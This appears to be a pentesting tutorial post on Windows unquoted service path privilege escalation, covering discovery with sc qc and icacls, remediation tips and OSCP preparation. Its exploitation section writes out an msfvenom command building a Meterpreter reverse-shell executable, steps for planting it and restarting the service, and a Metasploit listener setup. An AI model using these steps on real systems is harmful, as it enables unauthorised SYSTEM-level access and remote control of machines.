Hey everyone! 👋
I wanted to break down a classic but super underrated privilege escalation technique that every pentester should know: unquoted service paths on Windows.

---

🔑 Why Should You Care?

Privilege escalation is one of the key goals during a pentest. Getting initial access is cool — but you really want SYSTEM rights, right? Well, sometimes the simplest misconfigurations can give you exactly that. And unquoted service paths are a perfect example.

---

🧐 So, What’s an Unquoted Service Path?

Let’s skip the boring definitions. In Windows, services often run with high privileges. If the path to the service’s executable file includes a space but isn’t wrapped in quotes, Windows can get confused and run the wrong file — one that you, the attacker, may have planted.

Example:
Suppose the path is:

C:\Program Files\MyApp\service.exe

If it’s not wrapped in " ", Windows might look for:

C:\Program.exe

first. If you manage to drop a malicious Program.exe at C:\, Windows might run it with SYSTEM privileges when the service starts. 🎉

---

🔍 How Do You Find This?

Good news: finding unquoted service paths is dead simple.
Run:

sc qc "ServiceName"

If the BINARY_PATH_NAME shows a path with spaces without quotes — jackpot!

Next, check your write permissions:

icacls "C:\Program Files\MyApp"

If normal users can write there, you’re in business.

---

⚙️ How Do You Exploit It?

1️⃣ Check the Service’s Privileges
Make sure it’s running as SYSTEM or another high-privileged account.

2️⃣ Create Your Payload
Generate a malicious executable, e.g., a reverse shell:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=4444 -f exe > Program.exe

3️⃣ Drop the Payload
Place your Program.exe in the vulnerable path — say, C:\.

4️⃣ Restart the Service

sc stop "ServiceName" && sc start "ServiceName"

Boom! Your payload runs as SYSTEM.

5️⃣ Catch the Shell
Fire up Metasploit:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST YOUR_IP
set LPORT 4444
exploit

Congrats — you’re SYSTEM! 🔓

---

🛡️ How Do You Fix It?

If you’re a defender, it’s simple:
✅ Always use quotes around paths with spaces in service configurations.
✅ Use least privilege — don’t run services as SYSTEM unless you must.
✅ Audit permissions — make sure regular users can’t write to service directories.

---

💡 Wrapping Up

Unquoted service paths are old but gold. They’re still out there in the wild because sysadmins sometimes overlook tiny misconfigurations. Mastering tricks like this sets you apart — especially if you’re prepping for exams like the OSCP.